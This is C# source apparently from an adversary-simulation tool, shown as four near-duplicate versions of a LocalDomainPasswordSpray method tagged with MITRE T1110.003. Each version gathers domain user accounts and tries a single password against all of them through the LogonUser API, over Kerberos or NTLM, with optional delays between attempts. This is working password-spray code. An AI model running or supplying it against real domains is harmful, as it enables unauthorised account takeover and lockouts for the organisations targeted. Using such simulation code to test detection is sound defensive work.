public static void LocalDomainPasswordSpray(int usertype, int nuser, int protocol, int sleep, string password) { bool Kerberos = new bool(); List <User> usertargets = Lib.Targets.GetUserTargets(usertype, nuser); switch (protocol) { case 1: Kerberos = true; break; case 2: Kerberos = false; break; default: return; } Console.WriteLine("[*] Obtained {0} user accounts", usertargets.Count); String domain = System.Net.NetworkInformation.IPGlobalProperties.GetIPGlobalProperties().DomainName; if (usertype == 7) { domain = "."; } Console.WriteLine("[*] Starting Domain Password Spray Attack on {0}", Environment.MachineName); if (sleep > 0) { Console.WriteLine("[*] Sleeping {0} seconds between attempt", sleep); } foreach (var user in usertargets) { if (Kerberos) { CredAccessHelper.LogonUser(user.UserName, domain, password, 2, 0); if (sleep > 0) { Thread.Sleep(sleep * 1000); } } else { CredAccessHelper.LogonUser(user.UserName, domain, password, 2, 2); if (sleep > 0) { Thread.Sleep(sleep * 1000); } } } }
public static void LocalDomainPasswordSpray(PlaybookTask playbook_task, string log) { string currentPath = AppDomain.CurrentDomain.BaseDirectory; Lib.Logger logger = new Logger(currentPath + log); logger.SimulationHeader("T1110.003"); logger.TimestampInfo(String.Format("Local Domain Brute Force using the LogonUser Win32 API function")); logger.TimestampInfo(String.Format("Using {0}", playbook_task.protocol)); try { List <User> usertargets = Targets.GetUserTargets(playbook_task, logger); if (playbook_task.task_sleep > 0) { logger.TimestampInfo(String.Format("Sleeping {0} seconds between attempt", playbook_task.task_sleep)); } String domain = System.Net.NetworkInformation.IPGlobalProperties.GetIPGlobalProperties().DomainName; //if (playbook_task.user_target_type == 6) domain = "."; foreach (var user in usertargets) { if (playbook_task.protocol.ToUpper().Equals("KERBEROS")) { CredAccessHelper.LogonUser(user.UserName, domain, playbook_task.spray_password, 2, 0, logger); if (playbook_task.task_sleep > 0) { Thread.Sleep(playbook_task.task_sleep * 1000); } } else { CredAccessHelper.LogonUser(user.UserName, domain, playbook_task.spray_password, 2, 2, logger); if (playbook_task.task_sleep > 0) { Thread.Sleep(playbook_task.task_sleep * 1000); } } } logger.SimulationFinished(); } catch (Exception ex) { logger.SimulationFailed(ex); } }
public static void LocalDomainPasswordSpray(int usertype, int nuser, int protocol, int sleep, string password, string log) { string currentPath = AppDomain.CurrentDomain.BaseDirectory; Lib.Logger logger = new Lib.Logger(currentPath + log); logger.SimulationHeader("T1110"); //logger.TimestampInfo(String.Format("Starting T1110 Simulation on {0}", Environment.MachineName)); //logger.TimestampInfo(String.Format("Simulation agent running as {0} with PID:{1}", System.Reflection.Assembly.GetEntryAssembly().Location, Process.GetCurrentProcess().Id)); logger.TimestampInfo(String.Format("Local Domain Brute Force")); bool Kerberos = new bool(); try { List <User> usertargets = Lib.Targets.GetUserTargets(usertype, nuser); switch (protocol) { case 1: Kerberos = true; break; case 2: Kerberos = false; break; default: return; } //Console.WriteLine("[*] Obtained {0} user accounts", usertargets.Count); logger.TimestampInfo(String.Format("Obtained {0} user accounts", usertargets.Count)); String domain = System.Net.NetworkInformation.IPGlobalProperties.GetIPGlobalProperties().DomainName; if (usertype == 7) { domain = "."; } //Console.WriteLine("[*] Starting Domain Password Spray Attack on {0}", Environment.MachineName); //if (sleep > 0) Console.WriteLine("[*] Sleeping {0} seconds between attempt", sleep); foreach (var user in usertargets) { if (Kerberos) { CredAccessHelper.LogonUser(user.UserName, domain, password, 2, 0, logger); if (sleep > 0) { Thread.Sleep(sleep * 1000); } } else { CredAccessHelper.LogonUser(user.UserName, domain, password, 2, 2, logger); if (sleep > 0) { Thread.Sleep(sleep * 1000); } } } logger.SimulationFinished(); } catch (Exception ex) { logger.SimulationFailed(ex); } }
public static void LocalDomainPasswordSpray(int nuser, int sleep, string password, string log) { string currentPath = AppDomain.CurrentDomain.BaseDirectory; Lib.Logger logger = new Lib.Logger(currentPath + log); logger.SimulationHeader("T1110.003"); logger.TimestampInfo(String.Format("Local Domain Brute Force using the LogonUser Win32 API function")); bool Kerberos = new bool(); try { var rand = new Random(); //int usertype = rand.Next(1, 7); int usertype = 1; List <User> usertargets = Lib.Targets.GetUserTargets(usertype, nuser, logger); //int protocol = rand.Next(1, 3); int protocol = 2; switch (protocol) { case 1: Kerberos = true; break; case 2: Kerberos = false; break; default: return; } logger.TimestampInfo(String.Format("Obtained {0} user accounts", usertargets.Count)); if (sleep > 0) { logger.TimestampInfo(String.Format("Sleeping {0} seconds between attempt", sleep)); } String domain = System.Net.NetworkInformation.IPGlobalProperties.GetIPGlobalProperties().DomainName; if (usertype == 6) { domain = "."; } foreach (var user in usertargets) { if (Kerberos) { CredAccessHelper.LogonUser(user.UserName, domain, password, 2, 0, logger); if (sleep > 0) { Thread.Sleep(sleep * 1000); } } else { CredAccessHelper.LogonUser(user.UserName, domain, password, 2, 2, logger); if (sleep > 0) { Thread.Sleep(sleep * 1000); } } } logger.SimulationFinished(); } catch (Exception ex) { logger.SimulationFailed(ex); } }